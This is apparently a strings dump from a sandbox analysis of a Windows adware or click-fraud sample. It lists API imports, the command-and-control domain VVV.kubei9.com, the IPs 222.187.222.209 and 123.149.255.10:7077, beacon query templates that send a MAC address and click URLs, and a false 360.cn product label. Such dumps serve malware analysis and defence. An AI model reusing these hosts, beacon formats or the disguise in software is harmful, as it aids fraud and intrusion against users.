XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
T%Program Files%\NamuADLook.dll
T%Program Files%\NamuADLook.dll
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
1.3.6.1
(*.*)
(*.*)
1.0.0.0
1.0.0.0
sesvcs_963_56089.exe_1956:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u/P
8%u/P
operator
operator
GetProcessWindowStation
GetProcessWindowStation
_CorExeMain
_CorExeMain
.detour
.detour
222.187.222.209
222.187.222.209
123.149.255.10:7077
123.149.255.10:7077
NtQueryKey
NtQueryKey
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
?mac=%I64d&clickurl=%s&fromurl=%s&ver=%d&unionid=%d&iver=%d&uver=%d
?mac=%I64d&clickurl=%s&fromurl=%s&ver=%d&unionid=%d&iver=%d&uver=%d
EXPLORER.EXE
EXPLORER.EXE
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
?mac=%I64d&ver=%d&uver=%d&iver=%d&iswork=%d
?mac=%I64d&ver=%d&uver=%d&iver=%d&iswork=%d
E:\code\code\operate_text1015\operate_text\svn_Click_V_Click_LaoLiao\Release\WJDC1230_7777_42222.pdb
E:\code\code\operate_text1015\operate_text\svn_Click_V_Click_LaoLiao\Release\WJDC1230_7777_42222.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyW
RegCreateKeyW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
MSIMG32.dll
MSIMG32.dll
WS2_32.dll
WS2_32.dll
InternetOpenUrlW
InternetOpenUrlW
HttpQueryInfoW
HttpQueryInfoW
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindNextUrlCacheEntryW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
zcÃ
zcÃ
#*1892 $
#*1892 $
%,3:;4-&
%,3:;4-&
.?AUDWebBrowserEvents2@@
.?AUDWebBrowserEvents2@@
ýezccc{
ýezccc{
$/%DS
$/%DS
.CCCO222VBAAo
.CCCO222VBAAo
:::`121]
:::`121]
(('0"!!,
(('0"!!,
NNMSgfeu?B>T&&%0
NNMSgfeu?B>T&&%0
=(=,=0=4=
=(=,=0=4=
5!5.585[5
5!5.585[5
%0S0i0
%0S0i0
> >$>(>,>
> >$>(>,>
;*
;*
7 7$7(7,7074787
7 7$7(7,7074787
? ?@?`?|?
? ?@?`?|?
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
dbghelp.dll
dbghelp.dll
MSCOREE.DLL
MSCOREE.DLL
hXXp://
hXXp://
00_URL=
00_URL=
7/get_apis/paths/UPath0.txt
7/get_apis/paths/UPath0.txt
DEF_URL=
DEF_URL=
DEF_TEST_URL=
DEF_TEST_URL=
DEF_SERVICE_SUPPORT=
DEF_SERVICE_SUPPORT=
Windows NT 6.1
Windows NT 6.1
Windows NT 5.1
Windows NT 5.1
--URL_QUICK_LINK_BEG--
--URL_QUICK_LINK_BEG--
--URL_QUICK_LINK_END--
--URL_QUICK_LINK_END--
04_NEVAGATE_INKEY_PROB=
04_NEVAGATE_INKEY_PROB=
%I64d,%s
%I64d,%s
ntdll.dll
ntdll.dll
advapi32.dll
advapi32.dll
kernelbase.dll
kernelbase.dll
kernel32.dll
kernel32.dll
User32.DLL
User32.DLL
DSound.dll
DSound.dll
Winmm.dll
Winmm.dll
Y%dMÃ%d
Y%dMÃ%d
HTTP://
HTTP://
desktop.ini
desktop.ini
index.dat
index.dat
Shell.Explorer
Shell.Explorer
msimg32.dll
msimg32.dll
%s\%s
%s\%s
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
God bless you...Crush restart
God bless you...Crush restart
1URL=
1URL=
10UVSUPPORT=
10UVSUPPORT=
11SKEYWORD=
11SKEYWORD=
riched20.dll
riched20.dll
Advapi32.dll
Advapi32.dll
..\unstall000.exe
..\unstall000.exe
7SPROB=%d[^-^]
7SPROB=%d[^-^]
9CBTNPROB=%d[^-^]
9CBTNPROB=%d[^-^]
10UVSUPPORT=%d[^-^]
10UVSUPPORT=%d[^-^]
12DEF_XY_MOVE=%d[^-^]
12DEF_XY_MOVE=%d[^-^]
13MAXUACOUNT=%d[^-^]
13MAXUACOUNT=%d[^-^]
%d%d%d.txt
%d%d%d.txt
%I64d,%d
%I64d,%d
%Program Files%\sesvcs_963_56089.exe
%Program Files%\sesvcs_963_56089.exe
[.]color=rgb(12,204,108);bold=true;fsize=-13[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true;fsize=-13[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(0,0,0)[/.]%sc[.]color=rgb(12,204,108);fsize=-13;bold=true[/.]%s[.]color=rgb(153,153,153);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%sc[.]color=rgb(12,204,108);fsize=-13;bold=true[/.]%s[.]color=rgb(153,153,153);bold=false[/.]
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(136,136,136);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]color=rgb(136,136,136);bold=false[/.]
[.]color=rgb(12,204,108);bold=true[/.]%s
[.]color=rgb(12,204,108);bold=true[/.]%s
[.]color=rgb(89,89,89);bold=false[/.]%s
[.]color=rgb(89,89,89);bold=false[/.]%s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.]%d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.]%d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(251,81,0);bold=true[/.]%s[.]color=rgb(102,102,102);bold=false[/.]
[.]color=rgb(251,81,0);bold=true[/.]%s[.]color=rgb(102,102,102);bold=false[/.]
Z[.]color=rgb(0,0,0)[/.]%s
Z[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(255,0,0)[/.] %s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(255,0,0)[/.] %s
[.]color=rgb(0,138,250);link=102;linkcolor=rgb(26,160,255)[/.]%s^[.]bold=true[/.]
[.]color=rgb(0,138,250);link=102;linkcolor=rgb(26,160,255)[/.]%s^[.]bold=true[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]bold=true[/.]
[.]color=rgb(12,204,108);bold=true[/.]%d[.]bold=true[/.]
^[.]color=rgb(0,0,0)[/.]%s
^[.]color=rgb(0,0,0)[/.]%s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(157,157,157)[/.] %s
[.]color=rgb(12,204,108)[/.] %s[.]color=rgb(157,157,157)[/.] %s
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.] %d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,204,108);bold=true;fsize=-12[/.] %d [.]color=rgb(89,89,89);bold=false[/.]
[.]color=rgb(12,208,104);fsize=-16;[/.] %s[.]color=rgb(0,0,0);fsize=-16;[/.]?
[.]color=rgb(12,208,104);fsize=-16;[/.] %s[.]color=rgb(0,0,0);fsize=-16;[/.]?
%sf[.]color=rgb(51,51,51);fsize=-12[/.]%s
%sf[.]color=rgb(51,51,51);fsize=-12[/.]%s
[.]color=rgb(12,204,108)[/.]%s[.]color=rgb(255,0,0)[/.] %s
[.]color=rgb(12,204,108)[/.]%s[.]color=rgb(255,0,0)[/.] %s
360.cn
360.cn
7, 1, 0, 1120
7, 1, 0, 1120
(C) 360.cn All Rights Reserved.
(C) 360.cn All Rights Reserved.
SoftMgr.exe
SoftMgr.exe
%original file name%.exe_3308_rwx_10001000_00033000:
f9z.vk
f9z.vk
@Microsoft.XMLDOM
@Microsoft.XMLDOM
dwmapi.dll
dwmapi.dll
Riched20.dll
Riched20.dll
Riched32.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
gdiplus.dll
gdiplus.dll
GdiPlus.dll
GdiPlus.dll
gdi32.dll
gdi32.dll
user32.dll
user32.dll
Advapi32.dll
Advapi32.dll
advapi32.dll
advapi32.dll
User32.dll
User32.dll
ntdll.dll
ntdll.dll
Ole32.dll
Ole32.dll
shell32.dll
shell32.dll
atl.dll
atl.dll
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
GetProcessHeap
GetProcessHeap
&..0`%X
&..0`%X
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
.reloc
.reloc